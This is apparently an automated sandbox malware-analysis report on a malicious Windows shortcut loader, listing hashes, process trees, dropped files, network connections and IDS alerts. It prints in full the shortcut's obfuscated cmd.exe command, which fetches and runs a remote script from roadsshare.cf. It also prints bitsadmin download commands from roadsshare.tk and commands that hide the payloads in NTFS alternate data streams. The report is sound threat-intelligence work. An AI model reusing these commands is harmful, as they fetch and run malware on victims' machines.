analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Arquivo514_04_10_2019.lnk

Full analysis: https://app.any.run/tasks/a5434c8c-cb8a-4f17-80f1-9fbe8c39855d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 09, 2019, 15:28:27
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=18, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized
MD5:

FAC12693F40F950710681EB125E1058C

SHA1:

223E49D34DCB8366046181E308150BC54F9B3788

SHA256:

E925B17F09C667D4FEBEE88FEBA066C2DD80AE4148DB7B65968BC79C62FAF0A0

SSDEEP:

24:8aS37Dpd9Q2CzA6Y+/qiCwBIDnQgRY0j6XZUN84o0w5vZ4O1BrTI:8aSrD3n0VBu0Qo/x4OX0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes settings of System certificates

      • WScript.exe (PID: 2476)
    • Uses BITADMIN.EXE for downloading application

      • WScript.exe (PID: 2476)
    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 1676)
      • ExtExport.exe (PID: 2328)
  • SUSPICIOUS

    • Executed via COM

      • explorer.exe (PID: 3572)
    • Executes scripts

      • explorer.exe (PID: 3572)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2724)
      • WScript.exe (PID: 2476)
      • ExtExport.exe (PID: 2328)
    • Creates files in the user directory

      • WScript.exe (PID: 2476)
    • Adds / modifies Windows certificates

      • WScript.exe (PID: 2476)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 2496)
      • cmd.exe (PID: 2552)
      • cmd.exe (PID: 3732)
      • cmd.exe (PID: 3088)
      • cmd.exe (PID: 3960)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

MachineID: jumper-pc
IconFileName: %SystemRoot%\system32\imageres.dll
CommandLineArguments: /V /D /c "sEt SRM=%wYDIIindYDIIir%YDII\eYDIIXPYDIILoRYDIIeRYDII /cYDII,&&Set RZE=GeJDCWtOJDCWbjJDCWecJDCWt(JDCW'sJDCWcriJDCWpt:JDCWhttJDCWps:JDCW&&SEt hx76c22=KVIKVIroadsshare.cfKVI?07KVI') 2>&1 && sET/^p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" <nul > %UserPROfile%\m7Ye4i4.Js 2>&1 2>&1|call %SRM:YDII=% %UserProfile%\m7Ye4i4.jS 2>&1|e^xi^T"
RelativePath: .\Windows\System32\cmd.exe
Description: gfjc
LocalBasePath: C:\Windows\System32\cmd.exe
VolumeLabel: -
DriveType: Fixed Disk
TargetFileDOSName: cmd.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 18
TargetFileSize: 302592
ModifyDate: 2010:11:21 04:24:03+01:00
AccessDate: 2010:11:21 04:24:03+01:00
CreateDate: 2010:11:21 04:24:03+01:00
FileAttributes: Archive
Flags: IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
124
Monitored processes
52
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs explorer.exe no specs explorer.exe no specs wscript.exe bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs bitsadmin.exe no specs cmd.exe no specs cmd.exe searchprotocolhost.exe no specs cmd.exe cmd.exe cmd.exe cmd.exe no specs extexport.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs shutdown.exe no specs shutdown.exe no specs shutdown.exe no specs shutdown.exe no specs shutdown.exe no specs shutdown.exe no specs timeout.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2724"C:\Windows\System32\cmd.exe" /V /D /c "sEt SRM=%wYDIIindYDIIir%YDII\eYDIIXPYDIILoRYDIIeRYDII /cYDII,&&Set RZE=GeJDCWtOJDCWbjJDCWecJDCWt(JDCW'sJDCWcriJDCWpt:JDCWhttJDCWps:JDCW&&SEt hx76c22=KVIKVIroadsshare.cfKVI?07KVI') 2>&1 && sET/^p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" <nul > C:\Users\admin\m7Ye4i4.Js 2>&1 2>&1|call %SRM:YDII=% C:\Users\admin\m7Ye4i4.jS 2>&1|e^xi^T"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2580C:\Windows\system32\cmd.exe /S /D /c" sET/p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" 0<nul 1>C:\Users\admin\m7Ye4i4.Js 2>&1"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3596C:\Windows\system32\cmd.exe /S /D /c" call %SRM:YDII=% C:\Users\admin\m7Ye4i4.jS 2>&1"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3700C:\Windows\system32\cmd.exe /S /D /c" exiT"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1452C:\Windows\eXPLoReR /c, C:\Users\admin\m7Ye4i4.jS C:\Windows\explorer.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3572C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -EmbeddingC:\Windows\explorer.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2476"C:\Windows\System32\WScript.exe" "C:\Users\admin\m7Ye4i4.Js" C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
1073807364
Version:
5.8.7600.16385
2128"C:\Windows\System32\bitsadmin.exe" /transfer 52298 /priority foreground https://roadsshare.tk/07/landoqeahjkya.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkya.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
3472"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg" > "C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg"&&erase "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1404"C:\Windows\System32\bitsadmin.exe" /transfer 85686 /priority foreground https://roadsshare.tk/07/landoqeahjkyb.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkyb.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Total events
469
Read events
427
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
9
Text files
4
Unknown types
1

Dropped files

PID
Process
Filename
Type
2748cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkydx.gifbinary
MD5:6EA0310A175387E161817502FA576641
SHA256:E85954435FE1FE9CB5C042BD035513111D07F3ED41DA5B8D61E3D0C1A42C7C23
2476WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\roadsshare_cf[1].txtxml
MD5:92A4E2E27AD2694E8D6CB5170F7DAC1B
SHA256:60FB36DEE00FDACA3FAA840863F22B12B38B25D3E52FF3548943846E8BD4F4C9
1636cmd.exeC:\Users\Public\Libraries\trust\r1.logtext
MD5:DEE3DF2742A5AA5662ABF8637AC87A3A
SHA256:A368E5B71B293DB268F0B2981163333874EEFD26721E13645557B83C1CBC1E76
2848cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyi.gifbinary
MD5:176B1DC2B5059B6704E1B35E3EDCC62D
SHA256:26B0095DFF7C50AE12F165A62B4BA954520B60E54D923432213D92AD8090D412
2496cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyxa.~executable
MD5:D336F1B6EAAF81FDA7366C91FB050108
SHA256:8D1AEF50A85D87063F2BD05FBD782111B14F0467FED70D8E5DFB86B6F61E6D09
3692cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyxb.~binary
MD5:36F60D673EE6E65C8EEC16059B9ED634
SHA256:17921585FADF23A31A0FFA7991878B614119A0105679FC1339AD2EFD745C35B1
3472cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpgbinary
MD5:57BBFB7DFBD710AAEF209BFF71B08A32
SHA256:66C9C650E26635BF9E205E0EBB7B149A69A25F002917A1F9C5360149D423B30E
2476WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@roadsshare[1].txttext
MD5:E247EEAB9CF342F02D15883BDCB2E717
SHA256:B0A6B92EC436206029D8E81D777097E3B4A3B3C27DCE914542A1AA423E492590
2484cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyc.jpgbinary
MD5:731CE6815B16DA24A9B41261C9C4CB35
SHA256:40939CAF1D074EE825A2E1943F99D50AD6258C70612FA5F345FA35170A3D1BD1
3020cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkygx.gifbinary
MD5:4959533361EF3FD46F430D7F8F3411CA
SHA256:F42DD164EB8772BCE7B9DB81CEA30726DE4270961EFFA1EF582A0BD8539CA12B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
104.28.15.78:443
roadsshare.tk
Cloudflare Inc
US
unknown
2476
WScript.exe
104.27.131.120:443
roadsshare.cf
Cloudflare Inc
US
shared
2476
WScript.exe
104.27.130.120:443
roadsshare.cf
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
roadsshare.cf
  • 104.27.131.120
  • 104.27.130.120
suspicious
roadsshare.tk
  • 104.28.15.78
  • 104.28.14.78
suspicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .cf Domain
2476
WScript.exe
Potentially Bad Traffic
ET INFO Suspicious Domain (*.cf) in TLS SNI
Potentially Bad Traffic
ET DNS Query to a .tk domain - Likely Hostile
No debug info